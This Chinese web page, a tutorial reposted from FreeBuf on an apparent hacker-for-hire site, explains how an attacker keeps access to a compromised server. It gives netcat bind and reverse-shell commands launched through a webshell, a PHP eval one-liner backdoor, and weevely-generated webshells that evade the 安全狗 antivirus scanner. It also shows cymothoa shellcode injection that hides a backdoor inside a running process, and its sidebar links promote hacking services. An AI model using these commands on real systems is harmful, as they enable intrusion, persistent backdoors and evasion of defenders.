当前位置:首页 > 黑客技术 > 正文内容

渗透网站(怎么渗透网站)

hacker7个月前 (05-15)黑客技术47

  维持访问

  在获得了目标系统的访问权之后,攻击者需要进一步维持这一访问权限。使用木马程序、后门程序和rootkit来达到这一目的。维持访问是一种艺术形式,思想比渗透更加重要。

Netcat

Cryptcat

weevely

cymothoa

  1

  Netcat

  NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end) 工具,能被其它的程序或脚本直接地或容易地驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能。NetCat小巧且功能强大,可谓是居家旅行出门必备的“瑞士军刀”。

  一般我们使用netcat做的最多的事情为以下三种:

  1、 扫描指定IP端口情况

  2、 端口转发数据(重点)

  3、 提交自定义数据包

  实例演示:NC反弹CMDShell

  常用语法简单介绍

  #连接到某处

  netcat [-options] hostname port[s] [ports] …

  #监听端口等待连接

  netcat -l -p port [-options] [hostname] [port]

  #Options

  -u UDP 模式

  -v 显示详细信息 [-vv更详细信息]

  -w secs 连接超时设置

  -z I/O 模式 [扫描时使用]

  -l 监听入站信息

  -p port 打开本地端口

  -n 以数字形式表示的IP地址

  -t 以TELNET的形式应答入站请求

  -e prog 程序重定向

  扫描常用

  【命令】netcat -v ip port

  【解释】扫瞄某 IP 的某个端口,返回端口信息详细输出。

  【命令】netcat -v -z ip port-port

  【解释】扫描某IP的端口段,返回端口信息详细输出,但扫描速度很慢。

  【命令】netcat -v -z -u ip port-port

  【解释】扫描某 IP 的某 UDP 端口段,返回端口信息详细输出,但扫描速度很慢。

  【命令】netcat -nvv -w2 -z ip port-port

  【解释】扫锚某IP的端口段,连接超时时间为2秒。

  流量处理

  【命令】netcat -l -p 80

  【解释】开启本机的 TCP 80 端口并监听次端口的上传输的数据。

  【命令】netcat -l -v -p 80

  【解释】开启本机的 TCP 80 端口并将监听到的信息输出到当前 CMD 窗口。

  【命令】netcat -l -p 80 > log.dat

  【解释】开启本机的 TCP 80 端口并将监听到的信息输出到 log.dat 日志文件里。

  【命令】netcat -nvv 192.168.1.1 80

  【解释】连接到192.168.1.101主机的 80端口

  正向连接

  【远程运行】netcat -l -p 1234 -t -e %windir%\system32\cmd.exe

  【本地运行】netcat -nvv 192.168.1.1 1234

  采用正向连接方式,远程主机(注:假设IP地址为 192.168.1.1)上执行上述命令即为绑定远程主机的 CMD 到1234 端口,当本地主机连接远程主机成功时就会返回给本地主机一个CMD Shell 。

  反向连接

  【本地运行】netcat -l –vv -p 1234

  【远程运行】netcat -t -e %windir%\system32\cmd.exe 192.168.1.2 1234

  采用反向连接方式,先在本地主机运行 nc -l –vv -p 1234 开启1234 端口并监听等待远程主机连接;在远程主机上运行 nc -t -e cmd.exe 192.168.1.2 1234 将远程主机的 CMD 重定向到 IP 地址为 192.168.1.2(即本机) 端口号为1234 的主机上,连接成功后 IP 地址为 192.168.1.2 的主机会得到一个CMDShell。

  NC反弹CMDShell

  在Web渗透中,有时候拿到了webshell,我们经常会执行很多命令进行提权等操作,但当我们要尝试很多命令的时候,使用webshell执行cmd往往没有本地执行方便,Web程序不稳定,容易崩溃。因此可以借助Webshell通过NC反弹Cmdshell。

  #例如已经得到一只webshell如图

  小结

  简单看了下,得知:

  1、操作系统版本为Win NT 6.1.7601,那么要么Win7要么Win Server 2008,既然是服务器,后者可能性更大)

  2、目录访问权限:除了C盘不能访问,D、E、F、H盘都能跨目录访问,说明权限还是比较大的,另外很多文件都具有r/w权限

  3、通过多点Ping测试返回结果,可以认为该网站没有使用CDN加速,即能通过域名轻松得到真实IP

  关于判断CDN、找出CDN下真实IP的方法,我之前整理过,有兴趣的话也许可以看下这篇文章:绕过CDN查看真实IP

  

  通过以上信息,那么思路可以如下:步骤简单演示

  1、上传cmd.exe、nc.exe到D盘根目录(上传到权限大的目录)

  2、通过NC建立反弹得到CMDShell(一般选一个看起来“正常”点的端口,奇奇怪怪的端口防火墙容易拦截)

  【本地】netcat -l –vv -p 23

  【Shell上】nc.exe -t -e cmd.exe X.X.X.X 23

  其中X.X.X.X为本机公网IP,实际测试需确保外网能访问本机,必要时需端口映射等。

  【Shell上执行】nc.exe -t -e cmd.exe X.X.X.X 23

  【本地】成功得到CMDShell,即在本地可直接执行CMD

  2

  Cryptcat

  Netcat隧道加密之Cryptcat,正所谓菜刀砍狗头,渗透信猫流,狗和猫常常是相互的,比如安全狗。cryptcat与netcat最主要区别就是,通过隧道在传输数据时,它传输的数据经过了加密。

  Cryptcat是经典网络工具netcat的加密版,使用twofish算法加密,其密钥协商过程基于发送、接收双发共享的一个password。Cryptcat用法基本和NC相近,不过多介绍了。

  

  3

  weevely

  weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于php)。使用weevely生成的shell免杀能力很强,并使用加密连接,往往能轻松突破防火墙拦截。

  概要:常用语法简单介绍

  实例演示:一句话木马突破“安全狗”

  输入weevely generate可查看帮助

  

  #从提示中可以看到

  连接一句话木马: weevely <URL> <password> [cmd]

  加载session文件 weevely session <path> [cmd]

渗透网站(怎么渗透网站)

  生成后门代理 weevely generate <password> <path>

  实验环境:

  OS:Windows Server 2008 R2

  Server :Apache 2.4

  Firewall:安全狗(Apache版)V3.1正式版

  1. 将安全狗的网马库更新到最新后,再进行常规扫描,扫描结果为“未发现网页木马及其他危险文件”,即一切正常

渗透网站(怎么渗透网站)

  

  2. 手动在网站目录下随便添加一句话木马,命名为test.php,结果显然会被杀

  test.php <?php @eval($_POST['c']);?>

  

  #通过weevely生成一句话木马

  weevely generate test /root/Desktop/test.php

  (#test为密码,/root/Desktop/test.php输出路径)

  3. 将生成的木马放到网站根目录,替换原来的test.php

  4. 将生成的木马放到网站根目录,替换原来的test.php,并重新扫描

  

  5. 通过weevely连接一句话木马,可直接执行CMD

  weevely https://www.xxx.cn/test.php test

  

  4

  cymothoa

  Cymothoa 是一款可以将 shellcode 注入到现有进程的(即插进程)后门工具。借助这种注入手段,它能够把shellcode伪装成常规程序。它所注入的后门程序应当能够与被注入的程序(进程)共存,以避免被管理和维护人员怀疑。将shellcode注入到其他进程,还有另外一项优势:即使目标系统的安全防护工具能够监视可执行程序的完整性,只要它不检测内存,那么它就不能发现(插进程)后门程序的进程。

  很赞的点是注入到的进程,只要有权限就行,然后反弹的也就是进程相应的权限(并不需要root那样),当然进程重启或者挂了也就没了.当然动作也是很明显的。

  实例演示:利用Cymothoa注入后门

  1. 首先可先查看程序PID(*nix系统 ps ,windows系统 tasklist)

  

  2. 在使用Cymothoa时,须通过-p 选项指定目标进程的PID,并通过-s选项指定Shellcode的编号。例如对bash进程进行注入。

  查看:

  cymothoa -S

  比如对bash进行注入

  cymothoa -p 8150 -s 0 -y 1001

  3. 注入成功后如上图,其中 -y 代表开放后门端口

  

  4.可以看到注入成功后开了rpc。。

  写在最后

  嗯,这几篇文章么,是有个事情,刚好需要这些给一些大一大二的培训,然后xx找我整理,所以就简单的整理了下,内容么偏简单,介绍些工具,基本也没什么难度,Freebuf这边比较鼓励新人,因此给了个机会发了这些文章(这里感谢Freebuf,尤其洋葱哥)文章么老早就交了,写了什么也没忘了,所以前一篇一不小心xxx我也真的是没注意到,到现在我还是一脸蒙蔽的….

  那些在下面喷我的朋友们,我能理解Y(^_^)Y 被喷是好事,至少说明大家还是希望Freebuf多出好文的,以后投稿我会注意的。当然那些在下面挺我的小伙伴 我也非常感谢大家Y(^_^)Y有个好消息就是这是最后一篇了,我也不会再写也懒得再写这种东西了,说真的一个月前熬夜写这个也是一脸蒙蔽—+二脸蒙球的 某云现在不能愉快的玩耍了,以后就好好在FB混^ – ^ (另外,并没有基友啊,正想找一个^ ^呢,求推荐,一起??哈哈)

文/sysorem 来源/FreeBuf

  培养专业的网络安全人才,

  成就优秀的安全“大牛“

  QQ交流群:204528261

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/147645.html

标签: 渗透网站
分享给朋友:

“渗透网站(怎么渗透网站)” 的相关文章

天猫双十一购物津贴使用规则

每年的双十一玩法都有更新,玩法是越来越多,但仍保留了一些经典玩法,比如购物津贴。那么购物津贴是什么意思呢?天猫双十一购物津贴使用规则是什么?双十一购物津贴可以与哪些优惠叠加?双11购物津贴面值多少元?一起来了解一下吧!    ...

接单的黑客_可以找黑客黑美团吗

有在网络安全范畴中,猜测网络违法和歹意软件发展趋势好像现已成为了各大网络安全公司的传统了。 为了防止让咱们去阅览上百页的安全陈述,咱们专门整兼并总结了McAfee、Forrester、FiskIQ、卡巴斯基实验室【1、2、3】、WatchGuard、Nuvias、FireEye、CyberArk、F...

Webshell安全检测篇

0x00 依据流量的检测办法 1.概述 笔者一直在重视webshell的安全剖析,最近就这段时刻的心得体会和咱们做个共享。 webshell一般有三种检测办法: 依据流量方法 依据agent方法(本质是直接剖析webshell文件) 依据日志剖析方法 Webshell的分...

如何查询酒店开房记录?谁可以查?网上怎么查?

关于酒店开房记录,这个基本上是看不到的,只有公检法系统(主要是公安局)才能查询的。如果你真想查询,要提供相关真实的身份证明,到公安局咨询,可能需要繁琐的手续。 2014年初,网上就有过“2000W开房数据泄露”的惊爆新闻,是因众多酒店使用了浙江慧达驿站公司开发的酒店Wi-Fi管理、认证系统,而该公司...

小型隧道掘进机价格 「小型隧道挖洞机」

将用于岩石地层的隧道掘进机称为T其实,做高铁隧道挖掘机220一个月,同时破碎洞内围岩及掘进。 小型掘进机,由上向下分部进行开挖。释文:隧道掘进机是用机械破碎岩石、习惯上将用于软土地层的称为盾构,结构:它是利用回转刀具开挖,而使隧道一次成形的机械。谢谢知道机的朋友。 形成整个隧道断面的一种新型、加重量...

今天大蒜价格 - 大蒜期货行情

6点20元/市斤左右,2010年12月20日金乡,斑鸠店今日大蒜价格2012年8月21日,50元/市斤左右,回家的时候是4点5公分7?未来一段时间价格是涨还是降,印尼:2点70元/斤左右。小蒜:1点70元/斤左右。单位:元/千克,5点0-6点0公分:2点30-2点。 所以我感觉大蒜要是能存的话,印尼...

评论列表

鹿岛十驹
7个月前 (05-16)

D 窗口。  【命令】netcat -l -p 80 > log.dat  【解释】开启本机的 TCP 80 端口并将监听到的信息输出到 log.dat 日志文件里。  【命令】netcat -nvv 192.168.1.1 80  【

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。